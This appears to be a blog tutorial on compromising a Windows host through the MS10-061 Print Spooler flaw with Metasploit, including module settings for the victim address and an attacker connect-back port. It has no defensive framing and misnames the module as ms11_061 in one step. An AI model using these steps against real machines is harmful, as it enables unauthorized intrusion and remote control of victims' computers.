Hacking Windows via MS10-061 Print Spooler Service Impersonation using Metasploit + Backtrack 5

Have you ever seen someone sharing their printer inside a network?? When you're working in an office maybe you will see this everyday, a printer connected to a computer and that computer act as a print server. But this vulnerability didn't discuss about print server, but the service behind printer sharing in Windows. In this tutorial we will try to hack windows via Windows printer sharing service.
This is the definition about this exploit according to metasploit website :
This module exploits the RPC service impersonation vulnerability detailed in Microsoft Bulletin MS10-061. By making a specific DCE RPC request to the StartDocPrinter procedure, an attacker can impersonate the Printer Spooler service to create a file. The working directory at the time is %SystemRoot%\system32. An attacker can specify any file name, including directory traversal or full paths. By sending WritePrinter requests, an attacker can fully control the content of the created file. In order to gain code execution, this module writes to a directory used by Windows Management Instrumentation (WMI) to deploy applications. This directory (Wbem\Mof) is periodically scanned and any new .mof files are processed automatically. This is the same technique employed by the Stuxnet code found in the wild.
Maybe you'll become impatient if I write too much about the intro so…let's start the tutorial

Requirement :

1. Metasploit framework

Step by Step :

1. The first step you need to explore your network locations and find printer sharing devices there. Below was my picture when I found one active printer sharing in my network.

2. Yep we've got 1 victim there and now let's prepare our metasploit console by typing msfconsole command, and then use ms11_061 exploit and set up the payload.

3. To view the available switch, use show options command. The picture below was my switch configuration to perform the attack.

Information :

set pname canon --> set up the printer name (see step 1)

set rhost 192.168.8.94 --> IP address that host the printer sharing

set lhost 192.168.8.92 --> attacker local address
(use ifconfig to view your IP)

set lport 443 --> connect back port from victim to our computer

4. Okay, until this step everything we've been set up so nice and ready to attack the victim. Let's run the exploit command to perform the attack and see we can pwned it or not.

5. Yep everything was running so pretty, and then for the last result after waiting for the session:

We owned the machine